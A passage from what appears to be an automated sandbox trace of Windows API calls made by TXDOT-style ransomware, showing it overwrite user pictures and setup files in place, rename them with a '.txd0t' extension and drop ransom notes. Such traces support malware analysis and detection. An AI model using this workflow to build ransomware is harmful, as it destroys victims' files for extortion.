psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t" [0076.297] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t") returned 0 [0076.297] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg", dwFileAttributes=0x80) returned 1 [0076.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\msdanvl vs inrtl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.297] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=48387) returned 1 [0076.297] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.297] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.297] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff40fd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.298] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0xbd00, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0xbd00, lpOverlapped=0x0) returned 1 [0076.299] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff4300, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.299] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xbd00, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0xbd00, lpOverlapped=0x0) returned 1 [0076.299] FlushFileBuffers (hFile=0x46c) returned 1 [0076.305] GetProcessHeap () returned 0xe30000 [0076.305] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed3048 [0076.305] StrCpyW (in: psz1=0xed3048, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg" [0076.305] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg") returned="msDAnVl Vs INrTL.jpg" [0076.305] StrCpyW (in: psz1=0xed3082, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.305] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.305] GetProcessHeap () returned 0xe30000 [0076.305] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed3048 | out: hHeap=0xe30000) returned 1 [0076.305] CloseHandle (hObject=0x46c) returned 1 [0076.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\msdanvl vs inrtl.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\msdanvl vs inrtl.jpg.txd0t")) returned 1 [0076.307] SetEvent (hEvent=0x40c) returned 1 [0076.307] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.310] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png" [0076.310] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t" [0076.310] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t") returned 0 [0076.311] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png", dwFileAttributes=0x80) returned 1 [0076.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ootvwfhavr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.311] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=100751) returned 1 [0076.311] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.311] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.312] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe7471, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.312] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x18980, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x18980, lpOverlapped=0x0) returned 1 [0076.314] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe7680, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.314] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x18980, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x18980, lpOverlapped=0x0) returned 1 [0076.314] FlushFileBuffers (hFile=0x46c) returned 1 [0076.319] GetProcessHeap () returned 0xe30000 [0076.319] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfe) returned 0xecf5a0 [0076.319] StrCpyW (in: psz1=0xecf5a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png" [0076.319] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png") returned="oOTvWfHAVr.png" [0076.319] StrCpyW (in: psz1=0xecf5da, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.319] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.319] GetProcessHeap () returned 0xe30000 [0076.319] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf5a0 | out: hHeap=0xe30000) returned 1 [0076.319] CloseHandle (hObject=0x46c) returned 1 [0076.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ootvwfhavr.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\ootvwfhavr.png.txd0t")) returned 1 [0076.322] SetEvent (hEvent=0x40c) returned 1 [0076.322] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.328] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg" [0076.328] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t" [0076.328] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t") returned 0 [0076.328] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg", dwFileAttributes=0x80) returned 1 [0076.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\sulxmtx1.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.328] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=40665) returned 1 [0076.328] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.328] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.329] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff5f27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.329] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x9ed0, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x9ed0, lpOverlapped=0x0) returned 1 [0076.330] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff6130, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.330] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x9ed0, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x9ed0, lpOverlapped=0x0) returned 1 [0076.330] FlushFileBuffers (hFile=0x460) returned 1 [0076.336] GetProcessHeap () returned 0xe30000 [0076.336] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfa) returned 0xecf8b8 [0076.336] StrCpyW (in: psz1=0xecf8b8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg" [0076.336] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg") returned="SUlXmTX1.jpg" [0076.336] StrCpyW (in: psz1=0xecf8f2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.336] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.336] GetProcessHeap () returned 0xe30000 [0076.336] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf8b8 | out: hHeap=0xe30000) returned 1 [0076.336] CloseHandle (hObject=0x460) returned 1 [0076.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\sulxmtx1.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\sulxmtx1.jpg.txd0t")) returned 1 [0076.339] SetEvent (hEvent=0x40c) returned 1 [0076.339] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0076.344] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg" [0076.344] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t" [0076.344] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t") returned 0 [0076.345] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg", dwFileAttributes=0x80) returned 1 [0076.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\x7m0jvnegkr8aaftexty.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.345] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=63478) returned 1 [0076.345] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.345] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0076.345] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff060a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.345] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0xf7f0, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0xf7f0, lpOverlapped=0x0) returned 1 [0076.347] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff0810, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.347] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xf7f0, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0xf7f0, lpOverlapped=0x0) returned 1 [0076.347] FlushFileBuffers (hFile=0x46c) returned 1 [0076.359] GetProcessHeap () returned 0xe30000 [0076.359] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed18f8 [0076.359] StrCpyW (in: psz1=0xed18f8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg" [0076.359] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg") returned="x7M0JVNEgkR8AAFTEXtY.jpg" [0076.359] StrCpyW (in: psz1=0xed1932, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.359] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.359] GetProcessHeap () returned 0xe30000 [0076.359] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed18f8 | out: hHeap=0xe30000) returned 1 [0076.359] CloseHandle (hObject=0x46c) returned 1 [0076.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\x7m0jvnegkr8aaftexty.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\x7m0jvnegkr8aaftexty.jpg.txd0t")) returned 1 [0076.361] SetEvent (hEvent=0x40c) returned 1 [0076.361] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0077.462] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0078.624] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0080.020] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0081.096] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0082.183] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0083.269] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0084.288] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.239] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" [0085.239] StrCatW (in: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", psz2=".txd0t" | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.txd0t") returned="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.txd0t" [0085.239] PathFileExistsW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.txd0t") returned 0 [0085.239] SetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", dwFileAttributes=0x80) returned 1 [0085.240] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.240] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=40) returned 1 [0085.240] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.240] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.241] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffffdd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.241] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x20, lpOverlapped=0x0) returned 1 [0085.241] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.241] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x20, lpOverlapped=0x0) returned 1 [0085.241] FlushFileBuffers (hFile=0x460) returned 1 [0085.243] GetProcessHeap () returned 0xe30000 [0085.243] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1458 [0085.244] StrCpyW (in: psz1=0xed1458, psz2="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" [0085.244] PathFindFileNameW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned="PartnerSetupCompleteResult.log" [0085.244] StrCpyW (in: psz1=0xed1488, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.244] PathFileExistsW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\!TXDOT_READ_ME!.txt") returned 0 [0085.244] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\!TXDOT_READ_ME!.txt" (normalized: "c:\\$getcurrent\\logs\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0085.244] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f734*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x4a9f734*, lpNumberOfBytesWritten=0x4a9f730*=0x2, lpOverlapped=0x0) returned 1 [0085.245] FlushFileBuffers (hFile=0x47c) returned 1 [0085.248] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f730*=0x7f0, lpOverlapped=0x0) returned 1 [0085.249] FlushFileBuffers (hFile=0x47c) returned 1 [0085.250] CloseHandle (hObject=0x47c) returned 1 [0085.250] GetProcessHeap () returned 0xe30000 [0085.250] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1458 | out: hHeap=0xe30000) returned 1 [0085.250] CloseHandle (hObject=0x460) returned 1 [0085.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.txd0t" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.txd0t")) returned 1 [0085.252] SetEvent (hEvent=0x40c) returned 1 [0085.252] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.256] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" | out: psz1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" [0085.256] StrCatW (in: psz1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", psz2=".txd0t" | out: psz1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.txd0t") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.txd0t" [0085.256] PathFileExistsW (pszPath="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.txd0t") returned 0 [0085.256] SetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", dwFileAttributes=0x80) returned 1 [0085.258] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.258] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=156) returned 1 [0085.258] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.258] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.260] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffffd64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.260] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x90, lpOverlapped=0x0) returned 1 [0085.260] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.260] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x90, lpOverlapped=0x0) returned 1 [0085.260] FlushFileBuffers (hFile=0x460) returned 1 [0085.262] GetProcessHeap () returned 0xe30000 [0085.262] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.262] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" | out: psz1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" [0085.262] PathFindFileNameW (pszPath="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned="GetCurrentRollback.ini" [0085.262] StrCpyW (in: psz1=0xe9d784, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.262] PathFileExistsW 